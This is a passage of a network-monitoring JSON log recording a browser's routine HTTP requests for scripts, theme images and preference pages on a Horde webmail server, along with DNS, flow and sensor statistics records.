Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8721},"app_proto":"http","fileinfo":{"filename":"\/js\/scriptaculous\/effects.js","state":"CLOSED","stored":false,"size":38450,"tx_id":2}} {"timestamp":"2020-02-29T00:24:57.245147+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/hordecore.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6117}} {"timestamp":"2020-02-29T00:24:57.244833+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2337},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/logo.png","state":"CLOSED","stored":false,"size":2337,"tx_id":4}} {"timestamp":"2020-02-29T00:24:57.248170+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":423}} {"timestamp":"2020-02-29T00:24:57.248640+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":423},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/settings.png","state":"CLOSED","stored":false,"size":423,"tx_id":5}} {"timestamp":"2020-02-29T00:24:57.254870+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logout.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":674}} {"timestamp":"2020-02-29T00:24:57.255390+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logout.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":674},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/logout.png","state":"CLOSED","stored":false,"size":674,"tx_id":6}} {"timestamp":"2020-02-29T00:24:57.256235+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":116}} {"timestamp":"2020-02-29T00:24:57.256649+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":116},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-new-bg.png","state":"CLOSED","stored":false,"size":116,"tx_id":7}} {"timestamp":"2020-02-29T00:24:57.256868+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-normal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":221}} {"timestamp":"2020-02-29T00:24:57.259722+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-normal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":221},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-arrow-normal.png","state":"CLOSED","stored":false,"size":221,"tx_id":3}} {"timestamp":"2020-02-29T00:24:57.260421+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":436}} {"timestamp":"2020-02-29T00:24:57.260590+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tabset.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":105}} {"timestamp":"2020-02-29T00:24:57.261079+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":436},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-new.png","state":"CLOSED","stored":false,"size":436,"tx_id":8}} {"timestamp":"2020-02-29T00:24:57.262825+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tabset.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":105},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tabset.png","state":"CLOSED","stored":false,"size":105,"tx_id":4}} {"timestamp":"2020-02-29T00:24:57.305271+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/blacklist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":558}} {"timestamp":"2020-02-29T00:24:57.305309+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/whitelist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":546}} {"timestamp":"2020-02-29T00:24:57.393839+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/whitelist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":546},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/graphics\/whitelist.png","state":"CLOSED","stored":false,"size":546,"tx_id":9}} {"timestamp":"2020-02-29T00:24:57.394706+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/message.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":493}} {"timestamp":"2020-02-29T00:24:57.394760+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/blacklist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":558},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/graphics\/blacklist.png","state":"CLOSED","stored":false,"size":558,"tx_id":5}} {"timestamp":"2020-02-29T00:24:57.395059+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489}} {"timestamp":"2020-02-29T00:24:58.000531+0000","flow_id":943259344790734,"event_type":"flow","src_ip":"192.168.10.122","src_port":54456,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:57.419022+0000","end":"2020-02-29T00:19:57.527637+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:59.000368+0000","flow_id":599515932326705,"event_type":"flow","src_ip":"192.168.10.122","src_port":46256,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:19:58.719665+0000","end":"2020-02-29T00:19:58.830845+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:59.000883+0000","flow_id":1124622944265220,"event_type":"flow","src_ip":"192.168.10.81","src_port":52982,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1167,"bytes_toclient":9129,"start":"2020-02-29T00:23:53.222212+0000","end":"2020-02-29T00:23:58.492690+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:59.853152+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/message.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":493},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/alerts\/message.png","state":"CLOSED","stored":false,"size":493,"tx_id":10}} {"timestamp":"2020-02-29T00:24:59.853519+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":262}} {"timestamp":"2020-02-29T00:24:59.968706+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":262},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-arrow-active.png","state":"CLOSED","stored":false,"size":262,"tx_id":11}} {"timestamp":"2020-02-29T00:24:59.969044+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-subnavi.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":207}} {"timestamp":"2020-02-29T00:25:00.152171+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-subnavi.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":207},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-subnavi.png","state":"CLOSED","stored":false,"size":207,"tx_id":12}} {"timestamp":"2020-02-29T00:25:00.152424+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":535}} {"timestamp":"2020-02-29T00:25:02.195588+0000","flow_id":1124614358556355,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53130,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/date\/en-US.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2297},"app_proto":"http","fileinfo":{"filename":"\/js\/date\/en-US.js","state":"CLOSED","stored":false,"size":6704,"tx_id":0}} {"timestamp":"2020-02-29T00:25:02.202811+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53124,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/topbar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1180},"app_proto":"http","fileinfo":{"filename":"\/js\/topbar.js","state":"CLOSED","stored":false,"size":4199,"tx_id":2}} {"timestamp":"2020-02-29T00:25:02.203011+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53126,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/sound.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":974},"app_proto":"http","fileinfo":{"filename":"\/js\/scriptaculous\/sound.js","state":"CLOSED","stored":false,"size":2456,"tx_id":3}} {"timestamp":"2020-02-29T00:25:02.206799+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53120,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/hordecore.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6117},"app_proto":"http","fileinfo":{"filename":"\/js\/hordecore.js","state":"CLOSED","stored":false,"size":25017,"tx_id":3}} {"timestamp":"2020-02-29T00:25:02.308566+0000","flow_id":1002950820279638,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59724,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":53778,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:02.338773+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":535},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/settings-active.png","state":"CLOSED","stored":false,"size":535,"tx_id":13}} {"timestamp":"2020-02-29T00:25:02.400006+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/close.png","state":"CLOSED","stored":false,"size":489,"tx_id":6}} {"timestamp":"2020-02-29T00:25:02.416686+0000","flow_id":1002950820279638,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59724,"proto":"UDP","dns":{"type":"answer","id":53778,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:02.416686+0000","flow_id":1002950820279638,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59724,"proto":"UDP","dns":{"type":"answer","id":53778,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:02.472424+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423}} {"timestamp":"2020-02-29T00:25:02.559671+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18034,"tx_id":14}} {"timestamp":"2020-02-29T00:25:02.561541+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/js\/prefs.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":237}} {"timestamp":"2020-02-29T00:25:02.568769+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prefs.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":237},"app_proto":"http","fileinfo":{"filename":"\/js\/prefs.js","state":"CLOSED","stored":false,"size":318,"tx_id":15}} {"timestamp":"2020-02-29T00:25:02.609536+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":16,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":106}} {"timestamp":"2020-02-29T00:25:03.000163+0000","event_type":"stats","stats":{"uptime":15155,"capture":{"kernel_packets":140642,"kernel_drops":0},"decoder":{"pkts":140790,"bytes":96640184,"invalid":195,"ipv4":139205,"ipv6":10,"ethernet":140790,"raw":0,"null":0,"sll":0,"tcp":133643,"udp":5352,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088704},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2896,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2912,"synack":2903,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1910,"ftp":0,"smtp":0,"tls":780,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2447,"failed_udp":116},"tx":{"http":4955,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2531}},"flow_mgr":{"closed_pruned":2873,"new_pruned":17,"est_pruned":2530,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"